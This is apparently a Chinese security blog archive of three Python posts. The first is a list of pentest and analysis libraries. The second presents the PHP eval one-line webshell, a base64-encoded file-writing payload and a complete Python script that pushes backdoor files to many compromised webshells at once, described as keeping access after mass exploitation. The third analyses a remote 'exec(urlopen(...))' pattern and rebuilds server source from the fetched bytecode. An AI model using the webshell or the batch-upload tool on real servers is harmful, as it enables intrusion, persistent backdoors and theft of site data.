标签归档:Python

渗透测试人员的Python工具箱

如果你从事的行业是漏洞研究,逆向工程或者渗透测试,那么Python语言你将值得拥有。它是一个具有丰富的扩展库和项目的编程语言。本文仅仅列出了其中的一小部分。下面列举的工具大部分是用Python写的,剩下的一部分是C语言库的Python实现,且他们很容易被Python所使用。其中有些有攻击性比较强的工具(如:渗透测试框架,蓝牙,web漏洞扫描器,等等)被遗漏了,因为这些工具的使用在德国仍然存在一些法律风险。

网络:

  • Scapy, Scapy3k: send, sniff and dissect
    and forge network packets. Usable interactively or as a library
  • pypcap, Pcapy and pylibpcap: several different
    Python bindings for libpcap
  • libdnet: low-level networking
    routines, including interface lookup and Ethernet frame transmission
  • dpkt: fast, simple packet
    creation/parsing, with definitions for the basic TCP/IP protocols
  • Impacket:
    craft and decode network packets. Includes support for higher-level
    protocols such as NMB and SMB
  • pynids: libnids wrapper offering
    sniffing, IP defragmentation, TCP stream reassembly and port scan
    detection
  • Dirtbags py-pcap: read pcap
    files without libpcap
  • flowgrep: grep through
    packet payloads using regular expressions
  • Knock Subdomain Scan, enumerate
    subdomains on a target domain through a wordlist
  • SubBrute, fast subdomain
    enumeration tool
  • Mallory, extensible
    TCP/UDP man-in-the-middle proxy, supports modifying non-standard
    protocols on the fly
  • Pytbull: flexible IDS/IPS testing
    framework (shipped with more than 300 tests)

调试与逆向工程:

  • Paimei: reverse engineering
    framework, includes PyDBG, PIDA,
    pGRAPH
  • Immunity Debugger:
    scriptable GUI and command line debugger
  • mona.py:
    PyCommand for Immunity Debugger that replaces and improves on
    pvefindaddr
  • IDAPython: IDA Pro plugin that
    integrates the Python programming language, allowing scripts to run
    in IDA Pro
  • PyEMU: fully scriptable IA-32
    emulator, useful for malware analysis
  • pefile: read and work with
    Portable Executable (aka PE) files
  • pydasm:
    Python interface to the libdasm x86 disassembling library
  • PyDbgEng: Python wrapper for the
    Microsoft Windows Debugging Engine
  • uhooker:
    intercept calls to API calls inside DLLs, and also arbitrary
    addresses within the executable file in memory
  • diStorm: disassembler library
    for AMD64, licensed under the BSD license
  • python-ptrace:
    debugger using ptrace (Linux, BSD and Darwin system call to trace
    processes) written in Python
  • vdb / vtrace: vtrace is a
    cross-platform process debugging API implemented in python, and vdb
    is a debugger which uses it
  • Androguard: reverse
    engineering and analysis of Android applications
  • Capstone: lightweight
    multi-platform, multi-architecture disassembly framework with Python
    bindings
  • PyBFD: Python interface
    to the GNU Binary File Descriptor (BFD) library

Fuzzing:

  • Sulley: fuzzer development and
    fuzz testing framework consisting of multiple extensible components
  • Peach Fuzzing Platform:
    extensible fuzzing framework for generation and mutation based
    fuzzing (v2 was written in Python)
  • antiparser: fuzz testing and
    fault injection API
  • TAOF, (The Art of Fuzzing)
    including ProxyFuzz, a man-in-the-middle non-deterministic network
    fuzzer
  • untidy: general purpose XML fuzzer
  • Powerfuzzer: highly automated and
    fully customizable web fuzzer (HTTP protocol based application
    fuzzer)
  • SMUDGE
  • Mistress:
    probe file formats on the fly and protocols with malformed data,
    based on pre-defined patterns
  • Fuzzbox:
    multi-codec media fuzzer
  • Forensic Fuzzing
    Tools
    :
    generate fuzzed files, fuzzed file systems, and file systems
    containing fuzzed files in order to test the robustness of forensics
    tools and examination systems
  • Windows IPC Fuzzing
    Tools
    :
    tools used to fuzz applications that use Windows Interprocess
    Communication mechanisms
  • WSBang:
    perform automated security testing of SOAP based web services
  • Construct: library for parsing
    and building of data structures (binary or textual). Define your
    data structures in a declarative manner
  • fuzzer.py
    (feliam)
    :
    simple fuzzer by Felipe Andres Manzano
  • Fusil: Python library
    used to write fuzzing programs

Web:

  • Requests: elegant and simple HTTP
    library, built for human beings
  • HTTPie: human-friendly cURL-like command line
    HTTP client
  • ProxMon:
    processes proxy logs and reports discovered issues
  • WSMap:
    find web service endpoints and discovery files
  • Twill: browse the Web from a command-line
    interface. Supports automated Web testing
  • Ghost.py: webkit web client written
    in Python
  • Windmill: web testing tool designed
    to let you painlessly automate and debug your web application
  • FunkLoad: functional and load web
    tester
  • spynner: Programmatic web
    browsing module for Python with Javascript/AJAX support
  • python-spidermonkey:
    bridge to the Mozilla SpiderMonkey JavaScript engine; allows for the
    evaluation and calling of Javascript scripts and functions
  • mitmproxy: SSL-capable, intercepting HTTP
    proxy. Console interface allows traffic flows to be inspected and
    edited on the fly
  • pathod / pathoc: pathological daemon/client
    for tormenting HTTP clients and servers

取证分析:

  • Volatility:
    extract digital artifacts from volatile memory (RAM) samples
  • Rekall:
    memory analysis framework developed by Google
  • LibForensics: library for
    developing digital forensics applications
  • TrIDLib, identify file types
    from their binary signatures. Now includes Python binding
  • aft: Android forensic toolkit

恶意代码分析:

  • pyew: command line hexadecimal
    editor and disassembler, mainly to analyze malware
  • Exefilter: filter file formats
    in e-mails, web pages or files. Detects many common file formats and
    can remove active content
  • pyClamAV: add
    virus detection capabilities to your Python software
  • jsunpack-n, generic
    JavaScript unpacker: emulates browser functionality to detect
    exploits that target browser and browser plug-in vulnerabilities
  • yara-python:
    identify and classify malware samples
  • phoneyc: pure Python
    honeyclient implementation
  • CapTipper: analyse, explore and
    revive HTTP malicious traffic from PCAP file

PDF文件分析:

  • peepdf:
    Python tool to analyse and explore PDF files to find out if they can be harmful
  • Didier Stevens’ PDF
    tools
    : analyse,
    identify and create PDF files (includes PDFiD, pdf-parser and make-pdf and mPDF)
  • Opaf: Open PDF Analysis Framework.
    Converts PDF to an XML tree that can be analyzed and modified.
  • Origapy: Python wrapper
    for the Origami Ruby module which sanitizes PDF files
  • pyPDF2: pure Python PDF toolkit: extract
    info, spilt, merge, crop, encrypt, decrypt…
  • PDFMiner:
    extract text from PDF files
  • python-poppler-qt4:
    Python binding for the Poppler PDF library, including Qt4 support

杂项:

  • InlineEgg:
    toolbox of classes for writing small assembly programs in Python
  • Exomind:
    framework for building decorated graphs and developing open-source
    intelligence modules and ideas, centered on social network services,
    search engines and instant messaging
  • RevHosts: enumerate
    virtual hosts for a given IP address
  • simplejson: JSON
    encoder/decoder, e.g. to use Google’s AJAX
    API
  • PyMangle: command line tool
    and a python library used to create word lists for use with other
    penetration testing tools
  • Hachoir: view and
    edit a binary stream field by field
  • py-mangle: command line tool
    and a python library used to create word lists for use with other
    penetration testing tools

其他有用的扩展库与工具:

  • IPython: enhanced interactive Python
    shell with many features for object introspection, system shell
    access, and its own special command system
  • Beautiful Soup:
    HTML parser optimized for screen-scraping
  • matplotlib: make 2D plots of
    arrays
  • Mayavi: 3D scientific
    data visualization and plotting
  • RTGraph3D: create
    dynamic graphs in 3D
  • Twisted: event-driven networking engine
  • Suds: lightweight SOAP client for
    consuming Web Services
  • M2Crypto:
    most complete OpenSSL wrapper
  • NetworkX: graph library (edges, nodes)
  • Pandas: library providing
    high-performance, easy-to-use data structures and data analysis
    tools
  • pyparsing: general parsing
    module
  • lxml: most feature-rich and easy-to-use library
    for working with XML and HTML in the Python language
  • Whoosh: fast, featureful
    full-text indexing and searching library implemented in pure Python
  • Pexpect: control and automate
    other programs, similar to Don Libes `Expect` system
  • Sikuli, visual technology
    to search and automate GUIs using screenshots. Scriptable in Jython
  • PyQt and PySide: Python bindings for the Qt
    application framework and GUI library

相关书籍:

其他:

参考链接:https://github.com/dloss/python-pentest-tools

如何基于菜刀PHP一句话实现单个文件批量上传

0x00 前言

很多时候当我们通过某个通用型RCE漏洞批量抓取了很多的webshell后,可能想要批量传个后门以备后用。这时,我们不禁会面对一个问题,使用菜刀一个个上传显得太慢,那么如何快速的实现文件的批量上传呢?本文尝试以菜刀的php一句话为例来分析一下如何实现这类需求。

0x01 原理分析

首先,我们必须了解菜刀是如何通过一句话木马来实现web服务器的文件管理的。
下面是最常见的php一句话木马:

<?php eval($_POST[1]); ?>

当我们将一句话木马上传到web服务器上后,我们就可以直接在菜刀中输入上面的密码(如上例中的1)连接到服务器上来管理文件。
那么,此处的菜刀如何通过简单的一句话就可以实现对服务器的管理和控制呢?通过分析菜刀的原理,我们不难发现菜刀是利用了eval这个函数来执行通过POST方法传过来的命令语句。
因此,如果我们想通过菜刀一句话木马来实现文件上传的话,只需要向远程服务里上包含一句话的url发送一个带文件写入命令的POST请求即可,比如:

POST: 

1=@eval($_POST[z0]);&z0=echo $_SERVER['DOCUMENT_ROOT'];

上面代码包含2个部分:

  1. 一句话的密码
  2. 发送给服务器端的php执行代码

既然知道原理了,我们只需要发送如下的POST请求即可完成利用一句话木马上传文件的功能:

POST:

1=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9JF9QT1NUWyJ6MSJdOwokYz0kX1BPU1RbInoyIl07CiRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOwokYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTsKJGJ1Zj0iIjsKZm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MSkKICAgICRidWYuPXN1YnN0cigkYywkaSwxKTsKZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1ZikpOwplY2hvKCJ8PC0iKTsKZGllKCk7&z1=L3Zhci93d3cvcm9vdC8xLnR4dA==&z2=aGVsbG8gd29ybGQh

仔细分析一下这段POST数据包含以下几个部分:

1. 首先是一句话木马的密码1

2. 通过eval方法来执行base64解码后的z0,解码后显示如下:

@ini_set("display_errors","0"); 
@set_time_limit(0); 
@set_magic_quotes_runtime(0); 
echo("->|");; 
$f=base64_decode($_POST["z1"]); 
$c=base64_decode($_POST["z2"]); 
$c=str_replace("\r","",$c); 
$c=str_replace("\n","",$c); 
$buf=""; 
for($i=0;$i<strlen($c);$i+=1) 
$buf.=substr($c,$i,1); 
echo(@fwrite(fopen($f,"w"),$buf)); 
echo("|<-"); 
die();

3. 在z0中继续调用base64解码后的z1和z2,解码后如下:

z1=/var/www/root/1.txt&z2=hello world!

至此,我们可以很清楚的发现上面的POST请求的作用实际上是将一个写有hello world!的名为1.txt的文件上传至服务器上/var/www/root/路径下。

0x02 代码实现

基于上面的原理分析,我们可以利用下面的代码来实现利用php一句话实现文件批量上传:

#!/usr/bin/python  
#coding=utf-8  
  
import urllib  
import urllib2
import sys
import base64
import re
  
def post(url, data):  
    req = urllib2.Request(url)  
    data = urllib.urlencode(data)   
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())  
    response = opener.open(req, data)  
    return response.read()  
	
def get_shell_path(posturl,passwd):
    shell_path = ""
    try:
        data = {}
        data[passwd] = '@eval(base64_decode($_POST[z0]));'
        data['z0']='ZWNobyAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107'
        shell_path = post(posturl, data).strip()
    except Exception:
        pass
    return shell_path
  
def main():
    print '\n+++++++++Batch Uploading Local File (Only for PHP webshell)++++++++++\n'
    shellfile = sys.argv[1] # 存放webshell路径和密码的文件
    localfile = sys.argv[2] # 本地待上传的文件名
    shell_file = open(shellfile,'rb')
    local_content = str(open(localfile,'rb').read())
    for eachline in shell_file:
        posturl = eachline.split(',')[0].strip()
        passwd = eachline.split(',')[1].strip()
        try:
            reg = ".*/([^/]*\.php?)"
            match_shell_name = re.search(reg,eachline)
            if match_shell_name:
                shell_name=match_shell_name.group(1)
                shell_path = get_shell_path(posturl,passwd).strip()
                target_path = shell_path.split(shell_name)[0]+localfile
                target_path_base64 = base64.b64encode(target_path)
                target_file_url = eachline.split(shell_name)[0]+localfile
                data = {}
                data[passwd] = '@eval(base64_decode($_POST[z0]));'
                data['z0']='QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pOwokYz1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejIiXSk7CiRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOwokYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTsKJGJ1Zj0iIjsKZm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MSkKICAgICRidWYuPXN1YnN0cigkYywkaSwxKTsKZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1ZikpOwplY2hvKCJ8PC0iKTsKZGllKCk7'
                data['z1']=target_path_base64
                data['z2']=base64.b64encode(local_content)
                response = post(posturl, data)
                if response:
                    print '[+] '+target_file_url+', upload succeed!'
                else:
                    print '[-] '+target_file_url+', upload failed!'
            else:
                print '[-] '+posturl+', unsupported webshell!'
        except Exception,e:
            print '[-] '+posturl+', connection failed!'
    shell_file.close()
  
if __name__ == '__main__':  
    main()

webshell.txt的格式: [一句话webshell文件路径],[webshell连接密码]如下:

http://www.example1.com/1.php, 1
http://www.example2.com/1.php, 1
http://www.example3.com/1.php, 1

保存上面脚本为batch_upload_file.py,执行命令python batch_upload_file.py webshell.txt 1.txt,效果显示如下:

shell

1.txt

声明:仅作学习交流,任何人不可用于非法目的,否则一切后果由其本人承担! 

相关链接: 

http://www.mamicode.com/info-detail-472361.html

一条Python命令引发的漏洞思考

0x00 起因

近日,在测试某个项目时,无意中发现在客户机的机器上可以直接运行一条Python命令来执行服务器端的Python脚本,故而,深入测试一下便有了下文。

0x01 分析

很多时候,因为业务的需要我们常常需要使用Python –c exec方法在客户机上来执行远程服务器上的Python脚本或者命令。
那么,在这种情况下,因为在命令是运行在客户机上,这就必然导致了远程服务器上的Python脚本会以一定的形式运行在客户机的内存中,如果我们可以获取并还原出这些代码,这也在一定程度上造成了服务器源码的泄露。
为了验证这种泄露风险,下面是我依据一个真实案例而创建了一个简单的演示Demo:

  1. 首先在服务器上创建了一个Python脚本py来模拟服务上的业务代码
  2. 然后利用compile方法将py编译成exec模式的code object对象并利用marshal.dump方法进行序列化存入一个二进制文件pyCode,将其保存在服务器上供客户端远程调用
  3. 接着在服务器上创建了测试脚本py,用来调用和反序列化服务器端二进制文件pyCode为exec方法可执行的code object对象

PyOrign.py 文件:

#!/usr/bin/env python

import random
import base64

class Test:
 x=''
 y=''
 def __init__(self, a, b):
 self.x = a
 self.y = b
 print "Initiation..., I'm from module Test"
 def add(self):
 print 'a =',self.x
 print 'b =',self.y
 c = self.x+self.y
 print 'sum =', c
 
if __name__ == '__main__':
 print "\n[+] I'm the second .py script!"
 a = Test(1,2)
 a.add()

test.py文件:

#!/usr/bin/env python
import imp

if imp.get_magic() != '\x03\xf3\r\n':
    print "Please update to Python 2.7.10 (http://www.python.org/download/)"
    exit()

import urllib, marshal, zlib, time, re, sys
print "[+] Hello, I'm the first .py script!"
_S = "http"
_B = "10.66.110.151"
exec marshal.loads(urllib.urlopen('%s://%s/mystatic/pyCode' % (_S, _B)).read())

接下来我们开始演示效果,首先在客户端执行以下命令:

python -c "exec(__import__('urllib2').urlopen('http://10.66.110.151/test/').read())"

运行后的结果显示如下:

run

简单分析一下这个过程,我们不难发现上面的命令在被执行后实际上发生的过程是这样的:

1) 首先利用urllib2的urlopen方法来读取远程服务器上的命令代码

1111

2) 然后判断客户机上的python的版本是不是2.7.10,如果是,则执行下面的代码继续获取远程服务器上的可执行代码:

exec marshal.loads(urllib.urlopen('http://10.66.110.151/mystatic/pyCode').read())

3) 接着,又利用urllib的urlopen方法读取远程服务器上的可执行代码:

3

4) 最后exec方法在客户机上执行marshal.loads方法反序列化后的code object对象

细心的朋友可能已经发现,在步骤3我们并没有像步骤1那样获取到exec执行的源码而是一个code object对象。那么我们不禁要思考一下, 有没有办法将这个code object对象还原成真正的Python源码呢?如果可以,是不是也就意味着服务器上的源码存在这很大的泄露风险呢?我们知道exec语句用来执行储存在字符串或文件中的Python语句,这既可以Python语句也可以是经过compile编译后的exec模式的code object对象。那么此处,不禁要思考获取到的code object是不是就是服务器上的Python脚本经过compile编译后的exec模式的code object对象呢?如果是的,那么只要我们能够构造出这个原始脚本编译后的pyc文件,也就意味着我们可以通过pyc文件来进一步还原出脚本的原始py文件。

接下来我们就来看看如何利用已知的code object对象来构造一个编译后的pyc文件。

首先,我们来分析一下pyc文件的构成。一个完整的pyc文件是由以下几部分组成:

  1. 四字节的Magic int(魔数),表示pyc版本信息
  2. 四字节的int,是pyc产生时间,若与py文件时间不同会重新生成
  3. 序列化了的PyCodeObject对象。

那么,我们是否已经具备这几部分。首先是四字节的魔数Magic int, 返回到上面分析过程中的步骤1,我们看到了下面一段代码:

import imp
if imp.get_magic() != '\x03\xf3\r\n':
    print "Please update to Python 2.7.10 (http://www.python.org/download/)"
    exit()

此处代码就是通过Magic int来判断客户主机上的Python版本信息,那么不用说这里的Magic int也就是imp.get_magic()获取到的值。

接下来是四字节的pyc的时间戳,经过我的测试发现此处的时间戳可以是任意符合格式的四字节int。

最后是序列化了的PyCodeObject对象,那么这个我们也有吗?没错,我们在步骤3中读取到的code object对象就是这个PyCodeObject对象。

既然构造pyc所具有的三个组成部分我们都有了,我们就来尝试构造一下这个pyc文件吧。按照猜测,远程服务器应该是通过compile方法来编译原始的脚本文件,那么我们就利用同样的方法来构造它。
这里我们利用了库文件py_compile的compile方法,其具体代码实现如下:

"""Routine to "compile" a .py file to a .pyc (or .pyo) file.

This module has intimate knowledge of the format of .pyc files.
"""

import __builtin__
import imp
import marshal
import os
import sys
import traceback

MAGIC = imp.get_magic()

__all__ = ["compile", "main", "PyCompileError"]


class PyCompileError(Exception):
    """Exception raised when an error occurs while attempting to
    compile the file.

    To raise this exception, use

        raise PyCompileError(exc_type,exc_value,file[,msg])

    where

        exc_type:   exception type to be used in error message
                    type name can be accesses as class variable
                    'exc_type_name'

        exc_value:  exception value to be used in error message
                    can be accesses as class variable 'exc_value'

        file:       name of file being compiled to be used in error message
                    can be accesses as class variable 'file'

        msg:        string message to be written as error message
                    If no value is given, a default exception message will be given,
                    consistent with 'standard' py_compile output.
                    message (or default) can be accesses as class variable 'msg'

    """

    def __init__(self, exc_type, exc_value, file, msg=''):
        exc_type_name = exc_type.__name__
        if exc_type is SyntaxError:
            tbtext = ''.join(traceback.format_exception_only(exc_type, exc_value))
            errmsg = tbtext.replace('File "<string>"', 'File "%s"' % file)
        else:
            errmsg = "Sorry: %s: %s" % (exc_type_name,exc_value)

        Exception.__init__(self,msg or errmsg,exc_type_name,exc_value,file)

        self.exc_type_name = exc_type_name
        self.exc_value = exc_value
        self.file = file
        self.msg = msg or errmsg

    def __str__(self):
        return self.msg


def wr_long(f, x):
    """Internal; write a 32-bit int to a file in little-endian order."""
    f.write(chr( x        & 0xff))
    f.write(chr((x >> 8)  & 0xff))
    f.write(chr((x >> 16) & 0xff))
    f.write(chr((x >> 24) & 0xff))

def compile(file, cfile=None, dfile=None, doraise=False):
    """Byte-compile one Python source file to Python bytecode.

    Arguments:

    file:    source filename
    cfile:   target filename; defaults to source with 'c' or 'o' appended
             ('c' normally, 'o' in optimizing mode, giving .pyc or .pyo)
    dfile:   purported filename; defaults to source (this is the filename
             that will show up in error messages)
    doraise: flag indicating whether or not an exception should be
             raised when a compile error is found. If an exception
             occurs and this flag is set to False, a string
             indicating the nature of the exception will be printed,
             and the function will return to the caller. If an
             exception occurs and this flag is set to True, a
             PyCompileError exception will be raised.

    Note that it isn't necessary to byte-compile Python modules for
    execution efficiency -- Python itself byte-compiles a module when
    it is loaded, and if it can, writes out the bytecode to the
    corresponding .pyc (or .pyo) file.

    However, if a Python installation is shared between users, it is a
    good idea to byte-compile all modules upon installation, since
    other users may not be able to write in the source directories,
    and thus they won't be able to write the .pyc/.pyo file, and then
    they would be byte-compiling every module each time it is loaded.
    This can slow down program start-up considerably.

    See compileall.py for a script/module that uses this module to
    byte-compile all installed files (or all files in selected
    directories).

    """
    with open(file, 'U') as f:
        try:
            timestamp = long(os.fstat(f.fileno()).st_mtime)
        except AttributeError:
            timestamp = long(os.stat(file).st_mtime)
        codestring = f.read()
    try:
        codeobject = __builtin__.compile(codestring, dfile or file,'exec')
    except Exception,err:
        py_exc = PyCompileError(err.__class__, err, dfile or file)
        if doraise:
            raise py_exc
        else:
            sys.stderr.write(py_exc.msg + '\n')
            return
    if cfile is None:
        cfile = file + (__debug__ and 'c' or 'o')
    with open(cfile, 'wb') as fc:
        fc.write('\0\0\0\0')
        wr_long(fc, timestamp)
        marshal.dump(codeobject, fc)
        fc.flush()
        fc.seek(0, 0)
        fc.write(MAGIC)

def main(args=None):
    """Compile several source files.

    The files named in 'args' (or on the command line, if 'args' is
    not specified) are compiled and the resulting bytecode is cached
    in the normal manner.  This function does not search a directory
    structure to locate source files; it only compiles files named
    explicitly.  If '-' is the only parameter in args, the list of
    files is taken from standard input.

    """
    if args is None:
        args = sys.argv[1:]
    rv = 0
    if args == ['-']:
        while True:
            filename = sys.stdin.readline()
            if not filename:
                break
            filename = filename.rstrip('\n')
            try:
                compile(filename, doraise=True)
            except PyCompileError as error:
                rv = 1
                sys.stderr.write("%s\n" % error.msg)
            except IOError as error:
                rv = 1
                sys.stderr.write("%s\n" % error)
    else:
        for filename in args:
            try:
                compile(filename, doraise=True)
            except PyCompileError as error:
                # return value to indicate at least one failure
                rv = 1
                sys.stderr.write(error.msg)
    return rv

if __name__ == "__main__":
    sys.exit(main())

在上面的代码中,我们可以看出,compile方法首先利用imp.get_magic()生成Magic int:

MAGIC = imp.get_magic()

然后根据py文件的创建时间来生成时间戳:

timestamp = long(os.fstat(f.fileno()).st_mtime

最后利用__builtin__.compile方法生成exec模式的code object对象,并使用marshal.dump方法将codeobject写入到pyc文件中

codeobject = __builtin__.compile(codestring, dfile or file,'exec')

知道了原理,接下来我们可以利用下面的脚本来构造pyc文件:

"""Routine to "compile" a .py file to a .pyc (or .pyo) file.

This module has intimate knowledge of the format of .pyc files.
"""

import __builtin__
import imp
import marshal
import os
import sys
import traceback
import zlib
import urllib

MAGIC = imp.get_magic()  #根据Python版本信息生成的魔数

__all__ = ["compile", "main", "PyCompileError"]


class PyCompileError(Exception):
    """Exception raised when an error occurs while attempting to
    compile the file.

    To raise this exception, use

        raise PyCompileError(exc_type,exc_value,file[,msg])

    where

        exc_type:   exception type to be used in error message
                    type name can be accesses as class variable
                    'exc_type_name'

        exc_value:  exception value to be used in error message
                    can be accesses as class variable 'exc_value'

        file:       name of file being compiled to be used in error message
                    can be accesses as class variable 'file'

        msg:        string message to be written as error message
                    If no value is given, a default exception message will be given,
                    consistent with 'standard' py_compile output.
                    message (or default) can be accesses as class variable 'msg'

    """

    def __init__(self, exc_type, exc_value, file, msg=''):
        exc_type_name = exc_type.__name__
        if exc_type is SyntaxError:
            tbtext = ''.join(traceback.format_exception_only(exc_type, exc_value))
            errmsg = tbtext.replace('File "<string>"', 'File "%s"' % file)
        else:
            errmsg = "Sorry: %s: %s" % (exc_type_name,exc_value)

        Exception.__init__(self,msg or errmsg,exc_type_name,exc_value,file)

        self.exc_type_name = exc_type_name
        self.exc_value = exc_value
        self.file = file
        self.msg = msg or errmsg

    def __str__(self):
        return self.msg


def wr_long(f, x):
    """Internal; write a 32-bit int to a file in little-endian order."""
    f.write(chr( x        & 0xff))
    f.write(chr((x >> 8)  & 0xff))
    f.write(chr((x >> 16) & 0xff))
    f.write(chr((x >> 24) & 0xff))

def compile(file, cfile=None, dfile=None, doraise=False):
    """Byte-compile one Python source file to Python bytecode.

    Arguments:

    file:    source filename
    cfile:   target filename; defaults to source with 'c' or 'o' appended
             ('c' normally, 'o' in optimizing mode, giving .pyc or .pyo)
    dfile:   purported filename; defaults to source (this is the filename
             that will show up in error messages)
    doraise: flag indicating whether or not an exception should be
             raised when a compile error is found. If an exception
             occurs and this flag is set to False, a string
             indicating the nature of the exception will be printed,
             and the function will return to the caller. If an
             exception occurs and this flag is set to True, a
             PyCompileError exception will be raised.

    Note that it isn't necessary to byte-compile Python modules for
    execution efficiency -- Python itself byte-compiles a module when
    it is loaded, and if it can, writes out the bytecode to the
    corresponding .pyc (or .pyo) file.

    However, if a Python installation is shared between users, it is a
    good idea to byte-compile all modules upon installation, since
    other users may not be able to write in the source directories,
    and thus they won't be able to write the .pyc/.pyo file, and then
    they would be byte-compiling every module each time it is loaded.
    This can slow down program start-up considerably.

    See compileall.py for a script/module that uses this module to
    byte-compile all installed files (or all files in selected
    directories).

    """
    timestamp = long(1449234682)  #可以是随机生成的时间戳
    try:
        codeobject = marshal.loads(urllib.urlopen('http://10.66.110.151/mystatic/pyCode').read())    # 反序列化获取远程服务器上的code object对象
    except Exception,err:
        py_exc = PyCompileError(err.__class__, err, dfile or file)
        if doraise:
            raise py_exc
        else:
            sys.stderr.write(py_exc.msg + '\n')
            return
    if cfile is None:
        cfile = file + (__debug__ and 'c' or 'o')
    with open(cfile, 'wb') as fc:
        fc.write('\0\0\0\0')
        wr_long(fc, timestamp)
        marshal.dump(codeobject, fc)  # 将序列化后的code object对象写入到pyc文件
        fc.flush()
        fc.seek(0, 0)
        fc.write(MAGIC)

def main(args=None):
    """Compile several source files.

    The files named in 'args' (or on the command line, if 'args' is
    not specified) are compiled and the resulting bytecode is cached
    in the normal manner.  This function does not search a directory
    structure to locate source files; it only compiles files named
    explicitly.  If '-' is the only parameter in args, the list of
    files is taken from standard input.

    """
    if args is None:
        args = sys.argv[1:]
    rv = 0
    if args == ['-']:
        while True:
            filename = sys.stdin.readline()
            if not filename:
                break
            filename = filename.rstrip('\n')
            try:
                compile(filename, doraise=True)
            except PyCompileError as error:
                rv = 1
                sys.stderr.write("%s\n" % error.msg)
            except IOError as error:
                rv = 1
                sys.stderr.write("%s\n" % error)
    else:
        for filename in args:
            try:
                compile(filename, doraise=True)
            except PyCompileError as error:
                # return value to indicate at least one failure
                rv = 1
                sys.stderr.write(error.msg)
    return rv

if __name__ == "__main__":
    compile('pyOrigin.py')

保存脚本为pyOrigin_compile.py在Python 2.7.10下运行即可构造出pyOrigin.pyc文件:

pyc

然后利用uncompyle2,即可将pyOrigin.pyc还原成pyOrigin.py。至此,我们成功地还原了原始的Python脚本。

py

 code

0x03 小结

分析思路:

  1. 根据Python –c exec命令获取到被执行的编译后的code object对象
  2. 猜测其为compile方法编译后的可被exec执行的code object对象
  3. 分析py_compile的compile方法编译py文件为pyc文件的原理并根据获取到的code object对象构造pyc文件
  4. 利用uncompyle2还原pyc文件为py文件,最后获取被执行的Python源码

主要潜在危害在于可造成远程服务器Python源码泄露。

相关资料:

http://drops.wooyun.org/papers/11243

http://www.freebuf.com/vuls/89567.html

http://blog.csdn.net/efeics/article/details/9255193

https://github.com/wibiti/uncompyle2